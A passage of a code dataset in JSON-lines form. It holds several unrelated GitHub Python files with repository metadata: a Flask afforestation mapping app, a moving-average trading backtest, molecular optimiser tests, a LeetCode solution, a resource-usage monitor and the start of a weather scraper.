{\n if (seen.has(value)) {\n return\n }\n seen.add(value)\n }\n return value\n }\n }\n {% endmacro %}\n \"\"\")\n\n\n\n@app.route('/news')\ndef afforestation_news():\n con = sqlite3.connect(\"mydb.db\")\n cur = con.cursor()\n cur.execute(\"SELECT id, startDate, endDate, organisation from afforestation\")\n details = cur.fetchall()\n\n print(details)\n return render_template(\"news.html\", details=details)\n\n\npolygons_list = list()\npts_in_list = list()\n\nglobal dict_ploygons\ndict_ploygons = dict()\n\n\n@app.route('/map')\ndef treeTypeMap(): # put app's code here\n db_data_locations = db_data_json_new[[\"Latitude\", \"Longitude\"]]\n db_data_locations_list = db_data_locations.values.tolist()\n db_data_locations_list_size = len(db_data_locations_list)\n global afforestation_filename\n\n con = sqlite3.connect(\"mydb.db\")\n cur = con.cursor()\n cur.execute(\"SELECT startDate, coordinates, points, endDate, id FROM afforestation\")\n polygons = cur.fetchall()\n print(type(polygons))\n\n for polygon in polygons:\n poly_ID = polygon[4]\n html = popup_html(polygon[0], polygon[1], polygon[3], polygon[4])\n popup1 = folium.Popup(folium.Html(html, script=True), max_width=500)\n\n # html = popup_html(polygon)\n if len(polygon) < 2:\n continue\n act_polygon = json.loads(polygon[1])\n pts_in_list = json.loads(polygon[2]) # get the points from the area in polygon\n print(pts_in_list)\n # polydata(f\"polygon{polygon[4]}\", pts_in_list)\n afforestation_filename = \"jsons/polygon{0}.json\".format(str(polygon[4]))\n if poly_ID not in dict_ploygons.keys():\n dict_ploygons[str(poly_ID)] = \"jsons/polygon{0}.json\".format(str(polygon[4]))\n\n # afforestation_filename = \"jsonpolygons.json\"\n print(type(pts_in_list))\n # list_of_id_pts_pairs.append({polygon[4]: pts_in_list})\n # poly_data_dump(afforestation_filename)\n # polydata(f\"polygon{polygons.index(polygon)}\", pts_in_list) #attach data from pts list to specific polygon json file -- done\n polydata(f\"polygon{polygon[4]}\", pts_in_list) # to rename the json files with the ids of the afforestations\n # afforestation_filename = \"jsons/polygon{0}.json\".format(str(polygons.index(polygon)))\n # to give the filename of the corresponding json file\n # print(afforestation_filename)\n # with open(f\"polygon{polygons.index(polygon)}\", \"w\") as outfile_pts:\n # json.dump(pts_in_list, outfile_pts)\n # 
print(polygons.index(polygon))\n print(polygon[4]) # to print the id of the polygon\n print(type(act_polygon))\n print(act_polygon)\n # act_polygon = polygon[1]\n locations = list()\n print(act_polygon)\n print(type(act_polygon))\n # folium.Polygon(locations = polygon)\n for locs in act_polygon:\n locations.append((locs['lat'], locs['lng']))\n # popup1 = folium.Popup(folium.Html(html, script=True), max_width=500)\n if datetime.strptime(polygon[0], '%Y-%m-%d') > datetime.combine(date.today(), datetime.min.time()):\n poly = folium.Polygon(locations=locations, popup=popup1, color=\"red\", weight=2, fill_color=\"red\", fill_opacity=0.02, tooltip=polygon[4])\n poly.add_to(map_osm)\n polygons_list.append(poly)\n else:\n poly = folium.Polygon(locations=locations, popup=popup1, color=\"green\", weight=2, fill_color=\"green\", fill_opacity=0.02, tooltip=polygon[4])\n poly.add_to(map_osm)\n polygons_list.append(poly)\n filepath = \"templates/map.html\"\n if os.path.exists(filepath):\n os.remove(filepath)\n map_osm.save('templates/map.html')\n # poly_data_dump(afforestation_filename)\n return map_osm._repr_html_()\n # return render_template(\"map.html\")\n\ndef polydata(filename, file_src):\n with open(f\"jsons/{filename}.json\", \"w\") as outfile_pts:\n print(pts_in_list)\n json.dump(file_src, outfile_pts)\n\n\n@app.route('/visstatus') # /visstatus/id\ndef visualise_polygon():\n print(afforestation_filename)\n file_name = dict_ploygons[poly_ID_selected]\n obj = pd.read_json(file_name)\n print(\"shshshshsh\")\n dv = plt.pie(obj, names=\"TreeType\", title=\"Tree Types piechart\")\n return io.to_html(dv)\n\n\n@app.route('/visstatushealth')\ndef visualise_polygon_health():\n file_name = dict_ploygons[poly_ID_selected]\n obj = pd.read_json(file_name)\n dv = plt.histogram(obj, x=\"Score\", color=\"Risk\", histfunc=\"count\", title=\"Tree health histogram\")\n\n return io.to_html(dv)\n\n\n@app.route('/visstatussoil')\ndef visualise_polygon_soil():\n obj = pd.read_json(dict_ploygons[poly_ID_selected_context])\n dv = plt.pie(data_frame=obj.groupby(['SoilTexture']).mean().reset_index(), values=\"SoilDepth\", names=\"SoilTexture\", title=\"Soil Diversity Pie chart\")\n return io.to_html(dv)\n\n\n@app.route('/visstatuselevation')\ndef visualise_polygon_elevation():\n obj = pd.read_json(dict_ploygons[poly_ID_selected_context])\n # dv = plt.histogram(data_frame=obj.groupby(['Elevationlvl']).mean().reset_index(), x=\"Elevationlvl\", y=\"Heightlvl\")\n dv = plt.histogram(data_frame=obj, x=\"Height\", histfunc=\"count\", title=\"Elevation Histogram\")\n\n\n # dv.update_layout(showlegend=False)\n return io.to_html(dv)\n\n\n@app.route('/visstatusweather')\ndef visualise_polygon_weather():\n obj = pd.read_json(dict_ploygons[poly_ID_selected_context])\n dv = plt.pie(data_frame=obj.groupby(['Rain']).mean().reset_index(), values=\"AvgRain\", names=\"Rain\", title=\"Average Rain Piechart\")\n return io.to_html(dv)\n\n\n@app.route('/visstatusslope')\ndef visualise_polygon_slope():\n obj = pd.read_json(dict_ploygons[poly_ID_selected_context])\n # dv = plt.histogram(data_frame=obj.groupby(['Aspect']).mean().reset_index(), x=\"Aspect\", y=\"Slope\")\n dv = plt.scatter_polar(obj, r=\"Slope\", theta=\"Aspect\",color_discrete_map=plt.colors.sequential.Plasma_r, color=\"Slope\", title=\"Slope and Aspect Scatter Polar chart\")\n\n return io.to_html(dv)\n\n\n@app.route('/globalsoil')\ndef visualise_soil():\n dv = plt.pie(db_data_json_new, values=\"SoilDepth\", names=\"SoilTexture\", title=\"Soil Diversity Piechart\")\n return 
io.to_html(dv)\n\n\n@app.route('/globalelevation')\ndef visualise_elevation():\n dv = plt.histogram(db_data_json_new, x=\"Height\", histfunc=\"count\", title=\"Elevation histogram\")\n return io.to_html(dv)\n\n\n@app.route('/globalweather')\ndef visualise_weather():\n dv = plt.pie(db_data_json_new, values=\"AvgRain\", names=\"Rain\", title=\"Average Rain Pie chart\")\n return io.to_html(dv)\n\n\n@app.route('/globalslope')\ndef visualise_slope():\n dv = plt.scatter_polar(db_data_json_new, r=\"Slope\", theta=\"Aspect\",color_discrete_map=plt.colors.sequential.Plasma_r, color=\"Slope\", title=\"Slope and Aspect Scatter Polar chart\")\n return io.to_html(dv)\n\n\n\n\n\n# def treeHealth(): # put app's code here\n# db_data_locations = db_data_json_new[[\"Latitude\", \"Longitude\"]]\n# db_data_locations_list = db_data_locations.values.tolist()\n# db_data_locations_list_size = len(db_data_locations_list)\n#\n# for point in range(0, db_data_locations_list_size):\n# html = popup_html(point)\n#\n# popup1 = folium.Popup(folium.Html(html, script=True), max_width=500)\n# if db_data_json_new[\"Burnt\"][point] == \"No\":\n# # folium.Marker(db_data_locations_list[point]).add_to(map_osm)\n# folium.Circle(location=db_data_locations_list[point], color=\"green\", popup=popup1,\n# opacity=db_data_json_new[\"Density\"][point], radius=20, fill_color=\"green\").add_to(map_health)\n# else:\n# folium.Circle(location=db_data_locations_list[point], color=\"red\", popup=popup1,\n# opacity=db_data_json_new[\"Density\"][point], radius=20, fill_color=\"green\").add_to(map_health)\n# # map_health.add_child(measure_control)\n# map_health.save('templates/mapHealth.html')\n# return map_health._repr_html_()\n\n\n\n\n# @app.route('/map')\n# def map():\n# return render_template('map.html')\n\n\n@app.route('/maphealth')\ndef mapHealth():\n return render_template('mapHealth.html')\n\ntrees_json_file = pd.read_json(\"treesplanted.json\")\n@app.route('/treesplanted')\ndef trees_planted():\n dv = plt.line(trees_json_file, x=\"Year\", y=\"TreesPlanted\", markers=True)\n return io.to_html(dv)\n\n\n# @app.route('/afforestations')\n# def afforestations_per_year():\n# con = sqlite3.connect(\"mydb.db\")\n# cur = con.cursor()\n# cur.execute(\"SELECT id, startDate FROM afforestation\")\n# details = cur.fetchall()\n# with open(\"jsonafforestations.json\", \"w\") as outfile:\n# json.dump(details, outfile)\n# dv = plt.box(pd.read_json(\"jsonafforestations.json\"), x=1, y=0)\n# con.close()\n# return io.to_html(dv)\n\n\n\n@app.route('/vis')\ndef dataVis():\n dv = plt.pie(db_data_json_new, names=\"TreeType\", title=\"Tree Types piechart\")\n return io.to_html(dv)\n\n\n@app.route('/visHealth')\ndef dataVisHealth():\n dv = plt.histogram(db_data_json_new, x=\"Score\", color=\"Risk\", histfunc=\"count\", title=\"Tree health histogram\")\n return io.to_html(dv)\n\n\n# @app.route('/visSoil')\n# def dataVisSoil():\n# dv = plt.pie(db_data_json_new, values=\"SoilDepth\", names=\"SoilTexture\")\n#\n# return dv._repr_html_()\n\n\ndict_extrema = dict()\ndata_list = list()\nli_intersect_point = list()\n\n\n@app.route('/measureFinish', methods = ['POST'])\ndef measureFinish():\n data = request.data\n data = json.loads(data)\n data = data['oJS_In']\n dict_extrema['x_max'] = 0\n dict_extrema['y_max'] = 0\n dict_extrema['x_min'] = 0\n dict_extrema['y_min'] = 0\n pts_list = data['points']\n\n if len(pts_list) == 0:\n return json.loads('{ \"response\": \"no_points\" }')\n\n for point in pts_list:\n lat, lng = (point['lat'], point['lng'])\n dict_extrema['x_max'] = 
lng if lng > dict_extrema['x_max'] else dict_extrema['x_max']\n dict_extrema['y_max'] = lat if lat > dict_extrema['y_max'] else dict_extrema['y_max']\n # dict_extrema['x_min'] = lng if lng < dict_extrema['x_min'] else dict_extrema['x_min']\n # dict_extrema['y_min'] = lat if lat < dict_extrema['y_min'] else dict_extrema['y_min']\n\n if dict_extrema['x_min'] == 0:\n dict_extrema['x_min'] = lng\n else:\n dict_extrema['x_min'] = lng if lng < dict_extrema['x_min'] else dict_extrema['x_min']\n\n if dict_extrema['y_min'] == 0:\n dict_extrema['y_min'] = lat\n else:\n dict_extrema['y_min'] = lat if lat < dict_extrema['y_min'] else dict_extrema['y_min']\n\n for o_point in db_data_parse:\n dict_point = dict()\n dict_point['x'] = o_point['Longitude']\n dict_point['y'] = o_point['Latitude']\n if b_intersects_base_x(dict_extrema, dict_point) and b_intersects_base_y(dict_extrema, dict_point):\n li_intersect_point.append(o_point)\n\n with open(\"specific.json\", \"w\") as outfile:\n json.dump(li_intersect_point, outfile)\n print(li_intersect_point)\n print(len(li_intersect_point))\n print(\"********************\")\n\n data_list.clear()\n data_list.append(data['points'])\n print(data_list)\n return json.loads('{ \"response\": \"success\" }')\n\n\n@app.route('/afforestationform', methods=['GET', 'POST'])\ndef form():\n map = treeTypeMap()\n form = AfforestationForm()\n if request.method == 'POST':\n conn = sqlite3.connect(\"mydb.db\")\n # if form.validate_on_submit():\n\n try:\n # print(coordinates)\n startDate = request.form['startDate']\n endDate = request.form['endDate']\n organisation = request.form['organisation']\n\n ar_points = json.loads(\"\"\"[]\"\"\")\n\n for point in data_list[0]:\n o_point = json.loads(\"\"\"{}\"\"\")\n o_point[\"lat\"] = point[\"lat\"]\n o_point[\"lng\"] = point[\"lng\"]\n ar_points.append(o_point)\n if datetime.strptime(endDate, '%Y-%m-%d') > datetime.strptime(startDate, '%Y-%m-%d') >= \\\n datetime.now() and organisation != \"\" and len(ar_points) > 2:\n\n # startDate = datetime.datetime.strptime(startDate, \"%Y-%m-%d\")\n # endDate = datetime.datetime.strptime(endDate, \"%Y-%m-%d\")\n # conn = sqlite3.connect(\"mydb.db\")\n cur = conn.cursor()\n cur.execute(\"INSERT INTO afforestation(coordinates, startDate, endDate, organisation, points) VALUES(?,?,?,?,?)\",\n (json.dumps(ar_points), startDate, endDate, organisation, json.dumps(li_intersect_point)))\n conn.commit()\n return redirect(url_for('submit_afforestation'))\n else:\n return render_template('applicationform.html', form=form, message=\"Invalid Input\")\n except Exception as e:\n # time.sleep(5)\n # return redirect(url_for(\"form\"))\n print(e)\n finally:\n if datetime.strptime(endDate, '%Y-%m-%d') > datetime.strptime(startDate, '%Y-%m-%d') >= \\\n datetime.now() and organisation != \"\" and len(ar_points) > 2:\n return redirect(url_for('submit_afforestation'))\n else:\n return render_template('applicationform.html', form=form, message=\"Invalid input\")\n\n conn.close()\n\n return render_template('applicationform.html', form=form, message=\"\")\n\n\n@app.route('/thankyouafforestation', methods=[\"GET\"])\ndef submit_afforestation():\n con = sqlite3.connect(\"mydb.db\")\n cur = con.cursor()\n cur.execute(\"SELECT * FROM afforestation ORDER BY id DESC LIMIT 1 \")\n details = cur.fetchone()\n # print(details)\n # print(type(details))\n return render_template(\"thankyouafforestation.html\", details=details)\n\n\ndef get_afforestations():\n con = sqlite3.connect(\"mydb.db\")\n cur = con.cursor()\n cur.execute(\"select id, 
organisation from afforestation WHERE startDate >= CURRENT_DATE \")\n data = cur.fetchall()\n # data = [(val[0], val[1]) for val in data]\n con.close()\n return data\n\n# string for ensuring email is in correct format\nregex = r'\\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\\.[A-Z|a-z]{2,}\\b'\n\n\n@app.route('/joinform', methods=['GET', 'POST'])\ndef join_form():\n map = treeTypeMap()\n form = JoinForm()\n session[\"afforestation\"] = get_afforestations()\n if request.method == 'POST':\n # if form.validate_on_submit():\n\n # print(coordinates)\n\n afforestation = request.form['afforestation']\n name = request.form['name']\n email = request.form['email']\n\n # startDate = datetime.datetime.strptime(startDate, \"%Y-%m-%d\")\n # endDate = datetime.datetime.strptime(endDate, \"%Y-%m-%d\")\n conn = sqlite3.connect(\"mydb.db\")\n cur = conn.cursor()\n print(\"try to insert\")\n if re.fullmatch(regex, email) and name != \"\":\n cur.execute(\"INSERT INTO volunteer(afforestation, name, email) VALUES(?,?,?)\",\n (afforestation, name, email))\n conn.commit()\n print(\"did it insert\")\n return redirect(url_for('join_afforestation'))\n else:\n return render_template('joinform.html', form=form, afforestation_list=session[\"afforestation\"], message=\"Wrong email format\")\n\n\n return render_template('joinform.html', form=form, afforestation_list=session[\"afforestation\"], message=\"\")\n\n\n@app.route('/thankyoujoin', methods=[\"GET\"])\ndef join_afforestation():\n con = sqlite3.connect(\"mydb.db\")\n cur = con.cursor()\n cur.execute(\"SELECT * FROM volunteer ORDER BY id DESC LIMIT 1 \")\n details = cur.fetchone()\n return render_template(\"thankyou.html\", details=details)\n\n\n\n\n\n# @app.route('/dvs')\n# def specificDV():\n#\n# # for index in range(0, len(li_intersect_point)):\n# # json.dump(li_intersect_point[index], outfile)\n#\n# specific_data = pd.read_json(\"specific.json\")\n# new_data_visualisation = plt.pie(specific_data, values=\"Density\", names=\"Vegetation\") # error is somewhere here\n# return new_data_visualisation._repr_html_()\n#\n# @app.route('/dvshealth')\n# def specificDVhealth():\n#\n# # for index in range(0, len(li_intersect_point)):\n# # json.dump(li_intersect_point[index], outfile)\n#\n# specific_data_health = pd.read_json(\"specific.json\")\n# # new_data_visualisation = plt.pie(specific_data, values=\"Density\", names=\"Vegetation\") # error is somewhere here\n# new_data_visualisation = plt.histogram(specific_data_health, x=\"Burnt\")\n# return new_data_visualisation._repr_html_()\n\n# @app.route('/dvssoil')\n# def specificDVsoil():\n#\n# specific_data_soil = pd.read_json(\"specific.json\")\n# new_data_visualisation = plt.pie(specific_data_soil, values=\"SoilDepth\", names=\"SoilTexture\")\n# return new_data_visualisation._repr_html_()\n\ndef popup_html(startDate, coordinates, endDate, id):\n # i = row\n # latitute = db_data_json_new[\"Latitude\"][i]\n # longitute = db_data_json_new[\"Longitude\"][i]\n # treeType = db_data_json_new[\"Vegetation\"][i]\n # density = db_data_json_new[\"Density\"][i]\n # health = db_data_json_new[\"Burnt\"][i]\n\n html = \"\"\"\n \n \n
    \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n
    StartDate\"\"\"+str(startDate)+\"\"\"
    EndDate\"\"\"+str(endDate)+\"\"\"
    Coordinates\"\"\"+str(coordinates)+\"\"\"
    ID\"\"\"+str(id)+\"\"\"
    \n
    \n \n \"\"\"\n return html\n\n\n\ndef b_intersects_base_x(dict_extrema, dict_point):\n return (dict_extrema['x_min'] < dict_point['x'] < dict_extrema['x_max'])\n # and\n # (dict_extrema['y_min'] < dict_point['y'] < dict_extrema['y_max']))\n\ndef b_intersects_base_y(db_extrema, dict_point):\n return (dict_extrema['y_min'] < dict_point['y'] < dict_extrema['y_max'])\n\n\nif __name__ == '__main__':\n app.run()\n","repo_name":"NickDev42/graduation-project-web-app","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":27353,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"21445539354","text":"from io import StringIO\nfrom langdetect import detect\nfrom talib.abstract import *\n\nimport datetime\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport os\nimport pandas as pd\n\nclass MovingAverageCrossStrategy(object):\n \"\"\" \n Requires:\n data - A OHLCV DataFrame.\n short_window - Lookback period for short moving average.\n long_window - Lookback period for long moving average.\"\"\"\n\n def __init__(self, data, short_window=5, long_window=20):\n self.data = data\n self.short_window = short_window\n self.long_window = long_window\n\n def generate_signals(self):\n \"\"\"Returns the DataFrame of symbols containing the signals\n to go long, short or hold (1, -1 or 0).\"\"\"\n signals = pd.DataFrame(index=self.data.index)\n signals['signal'] = 0.0\n\n ''' Create the set of short and long simple moving averages over the \n respective periods'''\n signals['short_mavg'] = SMA(self.data.close, self.short_window)\n signals['long_mavg'] = SMA(self.data.close, self.long_window)\n\n ''' Create a 'signal' (invested or not invested) when the short\n moving average crosses the long moving average, but only for\n the period greater than the shortest moving average window'''\n signals.signal[self.short_window:] = np.where(\n signals.short_mavg[self.short_window:] \n > signals.long_mavg[self.short_window:], 1.0, 0.0) \n\n ''' Take the difference of the signals in order to\n generate actual trading orders'''\n signals['position'] = signals.signal.diff() \n\n return signals\n\nclass Portfolio(object):\n \"\"\"Inherits Portfolio to create a system that purchases 100 units of \n a particular symbol upon a long/short signal, assuming the market \n open price of a bar.\n\n In addition, there are zero transaction costs and cash can be immediately \n borrowed for shorting (no margin posting or interest requirements). \n\n Requires:\n data - A OHLCV DataFrame.\n signals - A pandas DataFrame of signals (1, 0, -1) for each symbol.\n initial_capital - The amount in cash at the start of the portfolio.\"\"\"\n\n def __init__(self, data, signals, initial_capital=100000):\n self.data = data\n self.signals = signals\n self.initial_capital = float(initial_capital)\n self.trades = self.generate_trades()\n \n def generate_trades(self):\n \"\"\"Creates a 'trades' DataFrame that simply longs or shorts\n 1000 of the particular symbol based on the forecast signals of\n {1, 0, -1} from the signals DataFrame.\"\"\"\n trades = pd.DataFrame(index=self.signals.index).fillna(0.0)\n trades['trade'] = 1000*self.signals.signal\n return trades\n \n def backtest_portfolio(self):\n \"\"\"Constructs a portfolio from the positions DataFrame by \n assuming the ability to trade at the precise market open price\n of each bar (an unrealistic assumption!). 
\n\n        Calculates the total of cash and the holdings (market price of\n        each position per bar), in order to generate an equity curve\n        ('total') and a set of bar-based returns ('returns').\n\n        Returns the portfolio object to be used elsewhere.\"\"\"\n\n        ''' Construct the portfolio DataFrame to use the same index\n        as 'trade' and with a set of 'trading orders' in the\n        'pos_diff' object, assuming market open prices. '''\n        portfolio = pd.DataFrame(index=self.data.index)\n        pos_diff = self.trades.trade.diff()\n\n        '''Create the 'holdings' and 'cash' series by running through\n        the trades and adding/subtracting the relevant quantity from\n        each column '''\n        portfolio['holdings'] = self.trades.trade*self.data.open\n        portfolio['cash'] = self.initial_capital-(pos_diff*self.data.open).cumsum()\n\n        ''' Finalise the total and bar-based returns based on the 'cash'\n        and 'holdings' figures for the portfolio '''\n        portfolio['total'] = portfolio.cash + portfolio.holdings\n        portfolio['returns'] = portfolio.total.pct_change()\n        return portfolio\n\ndaily_trading = pd.read_csv('OHLCV.csv')\nsignals = MovingAverageCrossStrategy(daily_trading).generate_signals()\nportfolio = Portfolio(daily_trading, signals).backtest_portfolio()\n\n\nif __name__ == \"__main__\":\n    fig = plt.figure()\n    ax1 = fig.add_subplot(211, ylabel='Price in NTD')\n\n    ''' plot the closing price overlaid with the moving averages'''\n    daily_trading.close.plot(ax=ax1, color='r', lw=2.)\n    signals[['short_mavg', 'long_mavg']].plot(ax=ax1, lw=2.)\n\n    ''' plot the \"buy\" trades against prices '''\n    ax1.plot(signals.loc[signals.position == 1.0].index, \n             signals.short_mavg[signals.position == 1.0],\n             '^', markersize=10, color='m')\n\n    ''' plot the \"sell\" trades against prices '''\n    ax1.plot(signals.loc[signals.position == -1.0].index, \n             signals.short_mavg[signals.position == -1.0],\n             'v', markersize=10, color='k')\n    ax1.axes.xaxis.set_visible(False)\n\n    ''' plot the equity curve'''\n    ax2 = fig.add_subplot(212, ylabel='Portfolio returns (per 10k NTD)')\n    portfolio.returns.cumsum().plot(ax=ax2, lw=2.)\n\n    ''' plot the \"buy\" and \"sell\" trades against the equity curve '''\n    ax2.plot(portfolio.loc[signals.position == 1.0].index, \n             portfolio.returns.cumsum()[signals.position == 1.0],\n             '^', markersize=10, color='m')\n    ax2.plot(portfolio.loc[signals.position == -1.0].index, \n             portfolio.returns.cumsum()[signals.position == -1.0],\n             'v', markersize=10, color='k')\n    plt.show()\n","repo_name":"bobby891018/backtesting-in-stock-price","sub_path":"Strategy.py","file_name":"Strategy.py","file_ext":"py","file_size_in_byte":5674,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"1595144266","text":"import numpy as np\nfrom mchammer import get_atom_distance\n\n\ndef test_opt_get_bond_vector(\n    optimizer, bond_vector, position_matrix\n):\n    assert np.all(np.equal(\n        bond_vector,\n        optimizer._get_bond_vector(position_matrix, (0, 3)),\n    ))\n\n\ndef test_opt_bond_potential(optimizer, bond_potentials):\n    for i, d in enumerate([1, 2, 3, 4, 5, 6, 7]):\n        test = optimizer._bond_potential(distance=d)\n        assert np.isclose(test, bond_potentials[i], atol=1E-5)\n\n\ndef test_opt_nonbond_potential(optimizer, nonbond_potentials):\n    for i, d in enumerate([1, 2, 3, 4, 5, 6, 7]):\n        test = optimizer._nonbond_potential(distance=d)\n        assert np.isclose(test, nonbond_potentials[i], atol=1E-5)\n\n\ndef test_opt_compute_nonbonded_potential(\n    optimizer, position_matrix, nonbonded_potential\n):\n    test = 
optimizer._compute_nonbonded_potential(position_matrix)\n assert test == nonbonded_potential\n\n\ndef test_opt_compute_potential(\n optimizer, molecule, nonbonded_potential, system_potential\n):\n test_system_potential, test_nonbond_potential = (\n optimizer._compute_potential(\n molecule, bond_pair_ids=((0, 3), ),\n )\n )\n assert test_nonbond_potential == nonbonded_potential\n assert test_system_potential == system_potential\n\n\ndef test_opt_translate_atoms_along_vector(\n optimizer, molecule, position_matrix, position_matrix3\n):\n molecule = molecule.with_position_matrix(position_matrix)\n new_molecule = optimizer._translate_atoms_along_vector(\n mol=molecule,\n atom_ids=(3, 4, 5),\n vector=np.array([0, 5, 0])\n )\n assert np.all(np.equal(\n position_matrix3,\n new_molecule.get_position_matrix(),\n ))\n new_molecule = optimizer._translate_atoms_along_vector(\n mol=new_molecule,\n atom_ids=(3, 4, 5),\n vector=np.array([0, -5, 0])\n )\n print(position_matrix, new_molecule.get_position_matrix())\n assert np.all(np.equal(\n position_matrix,\n new_molecule.get_position_matrix(),\n ))\n\n\ndef test_opt_test_move(optimizer):\n # Do not test random component.\n assert optimizer._test_move(curr_pot=-1, new_pot=-2)\n\n\ndef test_opt_get_result(optimizer, molecule):\n original_pos_mat = molecule.get_position_matrix()\n subunits = molecule.get_subunits(bond_pair_ids=((0, 3), ))\n mol, results = optimizer.get_result(\n mol=molecule,\n bond_pair_ids=((0, 3), ),\n subunits=subunits,\n )\n\n final_bond_length = np.linalg.norm(\n optimizer._get_bond_vector(\n position_matrix=results.get_position_matrix(),\n bond_pair=(0, 3),\n ),\n )\n # Give it some wiggle room.\n assert 1.5 < final_bond_length\n assert final_bond_length < 2.5\n\n # Test all other bond lengths are equivalent.\n for bond in molecule.get_bonds():\n if (bond.get_atom1_id(), bond.get_atom2_id()) != (0, 3):\n test = get_atom_distance(\n position_matrix=results.get_position_matrix(),\n atom1_id=bond.get_atom1_id(),\n atom2_id=bond.get_atom2_id(),\n )\n bond_length = get_atom_distance(\n position_matrix=original_pos_mat,\n atom1_id=bond.get_atom1_id(),\n atom2_id=bond.get_atom2_id(),\n )\n assert np.isclose(test, bond_length, atol=1E-6)\n\n\ndef test_opt_get_trajectory(optimizer, molecule):\n original_pos_mat = molecule.get_position_matrix()\n subunits = molecule.get_subunits(bond_pair_ids=((0, 3), ))\n mol, results = optimizer.get_trajectory(\n mol=molecule,\n bond_pair_ids=((0, 3), ),\n subunits=subunits,\n )\n\n assert results.get_step_count() == 99\n assert len(tuple(results.get_steps_properties())) == 100\n\n final_bond_length = np.linalg.norm(\n optimizer._get_bond_vector(\n position_matrix=results.get_final_position_matrix(),\n bond_pair=(0, 3),\n ),\n )\n # Give it some wiggle room.\n assert 1.5 < final_bond_length\n assert final_bond_length < 2.5\n\n # Test all other bond lengths are equivalent.\n for bond in molecule.get_bonds():\n if (bond.get_atom1_id(), bond.get_atom2_id()) != (0, 3):\n test = get_atom_distance(\n position_matrix=results.get_final_position_matrix(),\n atom1_id=bond.get_atom1_id(),\n atom2_id=bond.get_atom2_id(),\n )\n bond_length = get_atom_distance(\n position_matrix=original_pos_mat,\n atom1_id=bond.get_atom1_id(),\n atom2_id=bond.get_atom2_id(),\n )\n assert np.isclose(test, bond_length, 
atol=1E-6)\n","repo_name":"andrewtarzia/MCHammer","sub_path":"tests/optimizer/test_optimizer.py","file_name":"test_optimizer.py","file_ext":"py","file_size_in_byte":4693,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"48"}
{"seq_id":"31080691495","text":"from typing import List\nimport collections\n\n\nclass Solution:\n    def intersection(self, nums: List[List[int]]) -> List[int]:\n        counter = collections.defaultdict(int)\n\n        for li in nums:\n            for num in li:\n                counter[num] += 1\n\n        ans = []\n        n = len(nums)\n        for num, count in counter.items():\n            if count == n:\n                ans.append(num)\n\n        return sorted(ans)","repo_name":"Merwan-J/competetive-programming","sub_path":"2248-intersection-of-multiple-arrays/2248-intersection-of-multiple-arrays.py","file_name":"2248-intersection-of-multiple-arrays.py","file_ext":"py","file_size_in_byte":410,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"}
{"seq_id":"6478433009","text":"from os import environ\nimport psutil, threading, hashlib\nenviron[\"PYTHONHASHSEED\"] = '1234'\ndef ratio(before, after):\n    return 100 * (1 - (after / before))\n\ndef integrity(filename, data = None):\n    md5 = hashlib.md5()\n\n    # Open, close, read file and calculate MD5 on its contents\n    if data is None:\n        with open(filename, \"rb\") as file_to_check:\n            # read contents of the file in 4096-byte blocks\n            for block in iter(lambda: file_to_check.read(4096), b''):\n                md5.update(block)\n    else:\n        md5.update(data)\n\n    return md5.hexdigest()\n\ndef performance_metrics():\n    global running\n    global cpu_usage\n    global memory_usage\n    cpu_usage = []\n    memory_usage = []\n\n    running = True\n\n    current_process = psutil.Process()\n\n    # start loop\n    while running:\n        cpu_usage.append(current_process.cpu_percent(interval = 1))\n        memory_usage.append(current_process.memory_percent())\n\ndef performance_metrics_system_wide():\n    global running\n    global cpu_usage\n    global memory_usage\n    cpu_usage = []\n    memory_usage = []\n\n    running = True\n    before_cpu_usage = psutil.cpu_percent()\n    before_memory_usage = psutil.virtual_memory().percent\n    # start loop\n    while running:\n        cpu_usage.append(abs(psutil.cpu_percent(interval = 1)-before_cpu_usage))\n        memory_usage.append(abs(psutil.virtual_memory().percent - before_memory_usage))\n\ndef start():\n    global t\n\n    # create thread and start it\n    t = threading.Thread(target = performance_metrics)\n    t.start()\n\ndef start_system_wide():\n    global t\n\n    # create thread and start it\n    t = threading.Thread(target = performance_metrics_system_wide)\n    t.start()\n\ndef stop():\n    global running\n    global cpu_usage\n    global memory_usage\n    global t\n    result = []\n    result.append(cpu_usage)\n    result.append(memory_usage)\n\n    # use `running` to stop loop in thread so thread will end\n    running = False\n\n    # wait for thread's end\n    t.join()\n\n    return result\n","repo_name":"achrovisual/ug-wsn-compression","sub_path":"performance_metrics.py","file_name":"performance_metrics.py","file_ext":"py","file_size_in_byte":1991,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"37546136149","text":"import requests\nfrom lxml import etree\n\n\nsession = requests.Session()\nfirst_url = 'http://www.nmc.cn/publish/observations/environmental.html'\nfog_url = 'http://www.nmc.cn/publish/fog.html'\nhaze_url = 'http://www.nmc.cn/publish/haze.html'\ndust_url = 'http://www.nmc.cn/publish/severeweather/dust.html'\nair_pollution_url = 
['http://www.nmc.cn/publish/environment/air_pollution-24.html','http://www.nmc.cn/publish/environment/air_pollution-48.html','http://www.nmc.cn/publish/environment/air_pollution-72.html',]\n\nheaders = {\n 'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36'\n}\n\ndef real():\n response = session.get(url= first_url,headers = headers)\n response.encoding = \"utf-8\"\n res = response.text\n html = etree.HTML(res)\n title = html.xpath('//div[@class=\"writing\"]/div')\n ret = html.xpath('//div[@class=\"writing\"]/p')\n image = html.xpath('//div[@class=\"writing\"]/div/img/@src')\n text_name = title+ret\n text_x = []\n for i in text_name:\n if i.text != None:\n text_x.append(i.text)\n\n for i in range(len(image)):\n if image[i] != None:\n res = session.get(image[i],headers = headers)\n with open('county_image/' + str(i) + '.jpg', 'wb') as f:\n f.write(res.content)\n return text_x\n\n\n\ndef wumai():\n response = session.get(url= fog_url,headers = headers)\n response.encoding = \"utf-8\"\n res = response.text\n html = etree.HTML(res)\n image = html.xpath('//div[@class=\"imgblock\"]/img/@src')\n response = session.get(url=haze_url, headers=headers)\n 